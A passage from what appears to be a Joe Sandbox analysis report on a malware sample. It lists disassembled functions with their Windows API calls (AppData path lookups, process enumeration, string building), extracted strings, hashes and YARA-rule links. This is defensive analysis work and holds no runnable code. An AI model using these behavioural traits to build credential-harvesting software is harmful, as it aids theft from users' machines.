                          • wsprintfA.USER32 ref: 00423D37
                            • Part of subcall function 004271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004271FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: c4b0dc3773a886eadf590034e5c37dd772f20946c550fd4cd3e3f4e2d7308e58
                          • Instruction ID: 0e46194ee50d905b4d2e8af0c3314395f48b7a4b229981bb9b007c4189480b7e
                          • Opcode Fuzzy Hash: c4b0dc3773a886eadf590034e5c37dd772f20946c550fd4cd3e3f4e2d7308e58
                          • Instruction Fuzzy Hash: 8F01AD71744710BFE7145B549C4AF6ABB79FB45B61F10011AFA05972D0CBB81900CAE5
                          Function 0042926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00429279
                            • Part of subcall function 004287FF: __amsg_exit.LIBCMT ref: 0042880F
                          • __amsg_exit.LIBCMT ref: 00429299
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit$__getptd
                          • String ID: XuC$XuC
                          • API String ID: 441000147-965221565
                          • Opcode ID: 4cb7f12c38583a7d4912f25a033b5d7660c28f9817bf0b90cceb2b465d83067c
                          • Instruction ID: 650311b94d7dd09fe26b020204c5dbe452121105094598836c84caf3c5d20b57
                          • Opcode Fuzzy Hash: 4cb7f12c38583a7d4912f25a033b5d7660c28f9817bf0b90cceb2b465d83067c
                          • Instruction Fuzzy Hash: 0C01C472B06B35FBD620FB29B80579E73606F04714F95056BE84067690CB2C6C41DBED
                          Function 00408710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00408737
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A188
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 553b742820cae0223f32763f78b48b2837723d7804ef9764059221064cc10c22
                          • Instruction ID: 6a050c7182ba86e4f9edcf12540e1962beac915d64326d2362294264bf04d6a9
                          • Opcode Fuzzy Hash: 553b742820cae0223f32763f78b48b2837723d7804ef9764059221064cc10c22
                          • Instruction Fuzzy Hash: F3F06D27B040210BC214643E9E8449EA94657E539037AD67AE89AFF399DC74EC8285D9
                          Function 004286D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0042781C: __mtinitlocknum.LIBCMT ref: 00427832
                            • Part of subcall function 0042781C: __amsg_exit.LIBCMT ref: 0042783E
                          • ___addlocaleref.LIBCMT ref: 00428756
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$XuC$xtC
                          • API String ID: 3105635775-1321301742
                          • Opcode ID: 5b5b5235c9705be20163b25a74b4a4be350bcbaa41c031cc4d3df2fd7f3ef48c
                          • Instruction ID: a07b39e379fe631c2dd46928df11cf5dd3050128e68682833b0f394ac5fd8ee3
                          • Opcode Fuzzy Hash: 5b5b5235c9705be20163b25a74b4a4be350bcbaa41c031cc4d3df2fd7f3ef48c
                          • Instruction Fuzzy Hash: 2401A571545710DAD720AF76A80570DB7E0AF40328F60890FE5D6576A1CBB8A544CB58
                          Function 0041E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041E544
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E573
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E581
                          • lstrcat.KERNEL32(?,00FBD648), ref: 0041E59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 11d9f56744845d9c53a32895c8ee140a75e32675b654f084e6722e1bd12f0c18
                          • Instruction ID: 78715f0a51526922b08d4b9e9fbff67d9824c5016d173beafd287134cc52a420
                          • Opcode Fuzzy Hash: 11d9f56744845d9c53a32895c8ee140a75e32675b654f084e6722e1bd12f0c18
                          • Instruction Fuzzy Hash: 4551B775B10208AFC755EB55DC86EEE3379EB48304F4404AEB906972D1DF78AE848FA4
                          Function 00421FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00421FDF, 00421FF5, 004220B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: 14ee6a1b48564f2d72cfacbe265b336440589b6b71c4e37d5320ec2df3d09da5
                          • Instruction ID: 2c31fdcefba01c6c50dadfb97140ab21d29af2af86dca38d249b5e92c32005cb
                          • Opcode Fuzzy Hash: 14ee6a1b48564f2d72cfacbe265b336440589b6b71c4e37d5320ec2df3d09da5
                          • Instruction Fuzzy Hash: AF215A357101A9AFC720EA35E5447EEF3A6EF84361FC44057CA184B341E3BA291AD79E
                          Function 0041EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041EBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041EBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 0041EBF1
                          • lstrcat.KERNEL32(?,00FBE080), ref: 0041EC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: f44c8fe01b78bf9ffe9778e429b03f31e3d3676987f01a2fac21585407633bc3
                          • Instruction ID: 7f5184747c260ad45a9a645cb8693ee190cb5297d06e30314be6de0808e9b3fa
                          • Opcode Fuzzy Hash: f44c8fe01b78bf9ffe9778e429b03f31e3d3676987f01a2fac21585407633bc3
                          • Instruction Fuzzy Hash: C031B971B101189BCB15EF69DD45BEE73B5AF48300F1004BDBA16A72D0DE74AE848F94
                          Function 00424480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 00424492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004244AD
                          • CloseHandle.KERNEL32(00000000), ref: 004244B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 004244E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          • Opcode ID: 029c60a11133292b78579776ac8f662a47e1db9485ded8d9746e7aa4106313b1
                          • Instruction ID: cda5d7c8528306af076172c733ed396b733482d14cf5ca3aff4a6c08cdc03aff
                          • Opcode Fuzzy Hash: 029c60a11133292b78579776ac8f662a47e1db9485ded8d9746e7aa4106313b1
                          • Instruction Fuzzy Hash: 65F0C8B0A016256BE720AB74AD49BE776A9EF54304F4005A6FA45D7280DBF499808BE4
                          Function 00428FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00428FDD
                            • Part of subcall function 004287FF: __amsg_exit.LIBCMT ref: 0042880F
                          • __getptd.LIBCMT ref: 00428FF4
                          • __amsg_exit.LIBCMT ref: 00429002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00429026
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 20008b949afe04f4c0db9c99c0ad443aa39e2c03d8264a222539faff6a2289d1
                          • Instruction ID: b8f168b3f7f9c443b9016e0642bc8b70409a1d24df25829d9b7d75a46bedbe91
                          • Opcode Fuzzy Hash: 20008b949afe04f4c0db9c99c0ad443aa39e2c03d8264a222539faff6a2289d1
                          • Instruction Fuzzy Hash: C3F09632B496349BD760BB7A7806B5E33A06F00728FA5411FF444676D2DF6C5900DA5D
                          Function 00427310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(------,00405BEB), ref: 0042731B
                          • lstrcpy.KERNEL32(00000000), ref: 0042733F
                          • lstrcat.KERNEL32(?,------), ref: 00427349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: adc57774bd4793d8eea96f035dc7f85e9a30f09413a88c1a063c923ae78d1415
                          • Instruction ID: 41363a66702e245ea0d93190ad3999332c7a2a6a22fef51966e50eb72596cbfd
                          • Opcode Fuzzy Hash: adc57774bd4793d8eea96f035dc7f85e9a30f09413a88c1a063c923ae78d1415
                          • Instruction Fuzzy Hash: F1F030746003128FCB249F75E858927B6F9EF45700318982EAC9AC3314E734D840CF60
                          Function 004133D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00413422
